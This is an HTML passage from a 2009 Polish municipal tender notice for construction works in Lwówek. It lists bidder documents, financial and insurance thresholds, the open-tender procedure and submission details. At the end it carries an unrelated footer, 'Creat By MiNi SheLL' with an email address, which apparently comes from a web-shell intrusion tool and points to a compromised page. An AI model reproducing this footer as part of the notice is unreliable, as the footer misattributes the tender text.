C.16) Dokumenty stwierdzające, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień - kopie uprawnień budowlanych w specjalnościach przewidzianych do kierowania i nadzoru nad prawidłowością wykonania przedmiotowego zamówienia  i przedstawią aktualny dokument potwierdzający przynależność do Okręgowej Izby Inżynierów Budownictwa dla osób/y 
odpowiedzialnej za realizację robót (kierownicy budowy), 

D.17) Informacja banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w którym wykonawca posiada rachunek, potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy w wysokości minimum 1.000.000,00zł na realizację przedmiotowego zamówienia
D.18) Aktualna polisa ubezpieczeniowa potwierdzającą że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej na kwotę nie mniejszą niż 200.000,00zł od jednego zdarzenia - zdarzenia wymieniono w § 3 ust. 7 pkt. 1) pakt 1/, 2/, 3/ projektu umowy.
D.19) Zgoda na okres płatności faktur częściowych dla poszczególnych zadań z harmonogramu rzeczowo - finansowego (zł. nr 8 do siwz) do 30 dni po pozytywnym dokonaniu odbioru częściowego i końcowego robót, co wykażą w akceptacji projektu umowy - projekt umowy (parafowana każda strona) podpisany bez zastrzeżeń lub z wyszczególnionymi zastrzeżeniami - zał. nr 3 do siwz,
D.20) Oświadczenie Wykonawcy, że przyjmuje warunek Zamawiającego, że ten nie udziela zaliczek na poczet wykonania przedmiotu zamówienia i poszczególnych jego części..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.bip.lwowek.com.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Bezpłatnie w Urzędzie Miasta i Gminy w Lwówku, ul. Ratuszowa 2, pokój nr 10 w godzinach urzędowania..</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 28.05.2009 godzina 09:00, miejsce: Ofertę należy złożyć w siedzibie Zamawiającego - Urząd Miasta i Gminy w Lwówku, ul. Ratuszowa 2, 64-310 Lwówek, pokój nr 5 - sekretariat.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com